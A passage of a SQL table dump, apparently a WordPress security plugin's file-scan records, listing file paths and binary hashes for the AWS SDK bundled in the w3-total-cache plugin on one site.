','I]C~]FLGǑZ+X_\0','',0,'?'),('l>K>RE','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CloudFront/CookieSigner.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CloudFront/CookieSigner.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\7/:z*DE','hSuFQV|h\ZT1Z','',0,'?'),('4  \Z7C❙)','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CloudFront/Exception/CloudFrontException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CloudFront/Exception/CloudFrontException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M@3jOR^.','RtŰ{Zj@JabPQ\r.\nY','',0,'?'),('M4Bhf','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CloudFront/Signer.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CloudFront/Signer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6 UTNU_;B_','!0  uc ','',0,'?'),('a5?\'','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CloudFront/UrlSigner.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CloudFront/UrlSigner.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0cq\0','w\nnج2tlpӲ\Ze0y','',0,'?'),('*\"d6;P|=I?p','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CloudHSMV2/CloudHSMV2Client.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CloudHSMV2/CloudHSMV2Client.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','qD!/V?|','1<+lONO(\Z20a˪4','',0,'?'),('Z}G$q_M9e','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CloudHSMV2/Exception/CloudHSMV2Exception.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CloudHSMV2/Exception/CloudHSMV2Exception.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@R%%y>','Gb{shnk̍Mm','',0,'?'),('z@٪uR,IK','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CloudHsm/CloudHsmClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CloudHsm/CloudHsmClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W/:Z+ z]','\"27ukϡ9XAUm','',0,'?'),('Oz_.#4`촵_','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CloudHsm/Exception/CloudHsmException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CloudHsm/Exception/CloudHsmException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','؃&۔5OA','KLibΛs3^+\\l-','',0,'?'),('y-ieK:','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CloudSearch/CloudSearchClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CloudSearch/CloudSearchClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1\r,5c]EI','}\r!X\0W<}}%BD3;b','',0,'?'),('`)igsO|/','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CloudSearch/Exception/CloudSearchException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CloudSearch/Exception/CloudSearchException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','æ[(B N\"','~d\"@y!uz9Y;vN=E:','',0,'?'),('.o\"\\Ҩ ','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CloudSearchDomain/CloudSearchDomainClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CloudSearchDomain/CloudSearchDomainClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#)|WYsL','?!m*7L;?p(H\nNi','',0,'?'),('[\Z(R,v','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CloudSearchDomain/Exception/CloudSearchDomainException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CloudSearchDomain/Exception/CloudSearchDomainException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[)ch-','AJW1a\\YifK','',0,'?'),('D\\p_Z{','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CloudTrail/CloudTrailClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CloudTrail/CloudTrailClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' a>ðw|{X','#z\'WLqC|k6<','',0,'?'),('-B;{J֩','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CloudTrail/Exception/CloudTrailException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CloudTrail/Exception/CloudTrailException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2/;\\\'b(0S','i3{J@lo\\H d<~;}G5v\"','',0,'?'),('s6˜9','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CloudTrail/LogFileIterator.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CloudTrail/LogFileIterator.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L0Z\\mD&Uf3','$MR:@eooz}uk','',0,'?'),('D_2$| UJ;','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CloudTrail/LogFileReader.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CloudTrail/LogFileReader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#zoT.K','[6\"Ĺ9aH!%-K','',0,'?'),('uIˋ:8R','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CloudTrail/LogRecordIterator.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CloudTrail/LogRecordIterator.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ZKVոtq','x:_X]aCk?^;XDT','',0,'?'),('9f <1^','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CloudWatch/CloudWatchClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CloudWatch/CloudWatchClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','XwCT-8','9[I&̯G`O^ONeA:Zc','',0,'?'),(' \r\\cR,\\','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CloudWatch/Exception/CloudWatchException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CloudWatch/Exception/CloudWatchException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%\nu.-3T','8kK^`K>Ky}6Jl','',0,'?'),('ɗdZUhss.','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CloudWatchEvents/CloudWatchEventsClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CloudWatchEvents/CloudWatchEventsClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o6Mtr!~H','6GIڀ` 2\r','',0,'?'),('\\\rvi7-','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CloudWatchEvents/Exception/CloudWatchEventsException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CloudWatchEvents/Exception/CloudWatchEventsException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','di]Ym/~8Ar','k\n\"k\\@kgmYfp%[J','',0,'?'),('lUy)8','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CloudWatchLogs/CloudWatchLogsClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CloudWatchLogs/CloudWatchLogsClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','kC`yDNF 77','PZ;7) to\'Ϧt+','',0,'?'),('o0?\ns&>kU','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CloudWatchLogs/Exception/CloudWatchLogsException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CloudWatchLogs/Exception/CloudWatchLogsException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y`bapzHp<','\r ڑ~Ž 1GQC2BUJӡ','',0,'?'),('2)@͕My','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CodeArtifact/CodeArtifactClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CodeArtifact/CodeArtifactClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5\03GfҊ','5`3IƦBxk>ֱS4.]','',0,'?'),('w\0\'vf\08~','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CodeArtifact/Exception/CodeArtifactException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CodeArtifact/Exception/CodeArtifactException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1w6H\r\0/n1','>dGՊۋoUEz1Ǣ 4e','',0,'?'),('3fÖ ])Ǿ','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CodeBuild/CodeBuildClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CodeBuild/CodeBuildClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J䕩ޣ|n[','xPi(Kmq L%)|ok2d^um','',0,'?'),(':!{ n94','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CodeBuild/Exception/CodeBuildException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CodeBuild/Exception/CodeBuildException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','AC) x>O','C9DdC:DVOH\rOm\Zh','',0,'?'),('] p|*n','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CodeCommit/CodeCommitClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CodeCommit/CodeCommitClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_ge C}w','_\'Ce{Mn\'0=/','',0,'?'),(')k SUD','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CodeCommit/Exception/CodeCommitException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CodeCommit/Exception/CodeCommitException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Bkʧ','%3+,BKZ2YaW.!T5`','',0,'?'),('|eڬ]L-ă','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CodeDeploy/CodeDeployClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CodeDeploy/CodeDeployClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','AMxkz','(Է*e$/Ju9w@','',0,'?'),('(֋eoͭĢL','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CodeDeploy/Exception/CodeDeployException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CodeDeploy/Exception/CodeDeployException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ߏd1_s',').׮FMtD \0J;-hUx?38V','',0,'?'),('NmiDb;lCc','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CodeGuruProfiler/CodeGuruProfilerClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CodeGuruProfiler/CodeGuruProfilerClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' pfPP٬iUGU','bAL\ZVik','',0,'?'),('@1\Zm(j?频','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CodeGuruProfiler/Exception/CodeGuruProfilerException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CodeGuruProfiler/Exception/CodeGuruProfilerException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F*{_y','uՈq`= s.i\Z3de','',0,'?'),('sI5 pH{}','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CodeGuruReviewer/CodeGuruReviewerClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CodeGuruReviewer/CodeGuruReviewerClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','yվEU6Bԙfa','nDC*ǥh +@)_','',0,'?'),('\Zh9o`,,єG','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CodeGuruReviewer/Exception/CodeGuruReviewerException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CodeGuruReviewer/Exception/CodeGuruReviewerException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','kI+U381\\K','Sq9`@~r`nkМxg+Ou','',0,'?'),('e&Ƀ>OrA','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CodePipeline/CodePipelineClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CodePipeline/CodePipelineClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',', SګAb_}t.','T]c \nNFg','',0,'?'),('HNe\'@kwc','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CodePipeline/Exception/CodePipelineException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CodePipeline/Exception/CodePipelineException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','dUL/0\Zۆۇ&','E3fU.W=--20ac7','',0,'?'),('csxl7]J','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CodeStar/CodeStarClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CodeStar/CodeStarClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b(CI','Vf\rQZ! \"MYij-Q( ','',0,'?'),('Z\"y,WZ\Ze','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CodeStar/Exception/CodeStarException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CodeStar/Exception/CodeStarException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+zK`&)G2xl',';`@. \"x 6ٸ^bvjTG','',0,'?'),('L{;S)IAH|','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CodeStarNotifications/CodeStarNotificationsClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CodeStarNotifications/CodeStarNotificationsClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','gwHKI˗','G)DgoqV\r_;)!g','',0,'?'),(']<ߥGBB$S:vp','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CodeStarNotifications/Exception/CodeStarNotificationsException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CodeStarNotifications/Exception/CodeStarNotificationsException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' ݣoE)H\\$k','Jczd`-YTIdf\rPmi>8l<5g,','',0,'?'),('Ѻ&~\"','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CodeStarconnections/CodeStarconnectionsClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CodeStarconnections/CodeStarconnectionsClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ܿdoE\'?','S[[FE\":','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CognitoIdentity/CognitoIdentityClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CognitoIdentity/CognitoIdentityClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P`_Nhrn','jy~|&C/!;le4B*','',0,'?'),('56y(j2>','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CognitoIdentity/CognitoIdentityProvider.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/CognitoIdentity/CognitoIdentityProvider.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\rЧPCI','d}ˮ&\"C@I2)`4','',0,'?'),('svv3W','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Comprehend/ComprehendClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Comprehend/ComprehendClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L:csXEPS','j.5eh mlZz\rz','',0,'?'),('_V E\0~ C','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Comprehend/Exception/ComprehendException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Comprehend/Exception/ComprehendException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o10Sit\\',')\'mkhũ7J|9p','',0,'?'),('3b\Z* .>-','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ComprehendMedical/ComprehendMedicalClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ComprehendMedical/ComprehendMedicalClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ӗ,q}V','֛8 G;5liZr}*Q ','',0,'?'),('.LjR/l','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ComprehendMedical/Exception/ComprehendMedicalException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ComprehendMedical/Exception/ComprehendMedicalException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H Vح@z}1B','J=sq2\r9/! 䲑#o','',0,'?'),('KgA[z-','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ComputeOptimizer/ComputeOptimizerClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ComputeOptimizer/ComputeOptimizerClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','yOf5j','Qu^A\0ivVǒ ','',0,'?'),('k\"\Z42ï\\','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ComputeOptimizer/Exception/ComputeOptimizerException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ComputeOptimizer/Exception/ComputeOptimizerException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']T ݙ& $ ','U3ymjOg7&ݬ]St%}f','',0,'?'),('L7','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ConfigService/ConfigServiceClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ConfigService/ConfigServiceClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d+[:]`','P{_>\"6NtB%Iȵ','',0,'?'),('*,]5ȋ@({U','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ConfigService/Exception/ConfigServiceException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ConfigService/Exception/ConfigServiceException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r3*;]7#YS(','YF[k*Yj!8]','',0,'?'),('`/Qg]$@','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ConfigurationProviderInterface.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ConfigurationProviderInterface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=b)8TUJg','lS<)ɓY\'SMI)paD','',0,'?'),('ΥWeH#g3','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Connect/ConnectClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Connect/ConnectClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')*5','piڕ-ȠnF\0+\Z,o\0mZB','',0,'?'),('zm˹,fia','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Connect/Exception/ConnectException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Connect/Exception/ConnectException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','psSɽr','\rٻZVbԂ0vyb柸','',0,'?'),(' Tq=|.pH\"','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ConnectContactLens/ConnectContactLensClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ConnectContactLens/ConnectContactLensClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Mm1bX=e','@>}!!Fh&&}=֡,%H','',0,'?'),(']C.NaÜ','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ConnectContactLens/Exception/ConnectContactLensException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ConnectContactLens/Exception/ConnectContactLensException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h{4^۲S\'D',' ,Sd5p\"BT}@urv\n \r','',0,'?'),('2n_׵emiT\r\n','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ConnectParticipant/ConnectParticipantClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ConnectParticipant/ConnectParticipantClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','bEY͇zZ','؁R=YuxR5=+Y>','',0,'?'),('K >~SCR','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ConnectParticipant/Exception/ConnectParticipantException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ConnectParticipant/Exception/ConnectParticipantException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\ny<<p|W Xp','Q-ѼB>m) \n0\n%>,}=l','',0,'?'),('@\Zf&','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Credentials/AssumeRoleCredentialProvider.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Credentials/AssumeRoleCredentialProvider.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-_ pqΑ%B','=E)\r/a\"*! w,z÷','',0,'?'),('Ay*\n+Y3','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Credentials/AssumeRoleWithWebIdentityCredentialProvider.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Credentials/AssumeRoleWithWebIdentityCredentialProvider.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~u{R_',')v}-@,_ Me!','',0,'?'),(':a]#(_y','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Credentials/CredentialProvider.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Credentials/CredentialProvider.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ena0cjȀa','\rf@5twO3c}','',0,'?'),('67J)iH)*','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Credentials/Credentials.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Credentials/Credentials.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<6 ~ Ϧ5 _','њV!5d,ԭo`ǣIPJaQw','',0,'?'),('qM`\"QE#6E','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Credentials/CredentialsInterface.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Credentials/CredentialsInterface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*bS\n<,\n','k^XOo{>#kS!s tk(< ','',0,'?'),('bC]thx28','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Credentials/EcsCredentialProvider.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Credentials/EcsCredentialProvider.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'ӏkF?R]u1+8d}+4l','',0,'?'),('_F0\rt>?','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Crypto/AesStreamInterfaceV2.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Crypto/AesStreamInterfaceV2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ŭ\\%?',':m㲃u7;UWGlL1\"7`ecCG','',0,'?'),('e@4DZQwBNEǍ','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Crypto/Cipher/Cbc.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Crypto/Cipher/Cbc.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Eq )','i`i5%\"ff9:ŌKy.6','',0,'?'),('d\r np\Z','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Crypto/Cipher/CipherBuilderTrait.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Crypto/Cipher/CipherBuilderTrait.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[\Z$V(\"y','bwrNFXgbWF\\0 ڐ|Co5p','',0,'?'),('K5u$^pYo','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Crypto/Cipher/CipherMethod.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Crypto/Cipher/CipherMethod.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Lg&=(D',';J.:z{G8K婁0EmB2n&','',0,'?'),(' \0G\Z6D$Ro','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Crypto/DecryptionTrait.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Crypto/DecryptionTrait.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G9Y`)?M_2','N$\\?i\Zƥ8ˍ[PH^N','',0,'?'),('t}*4y-w','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Crypto/DecryptionTraitV2.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Crypto/DecryptionTraitV2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6hF9C)&D=a','*۽n<1\'ɝH\09Lu--','',0,'?'),('|(2L7FՄ8','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Crypto/EncryptionTrait.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-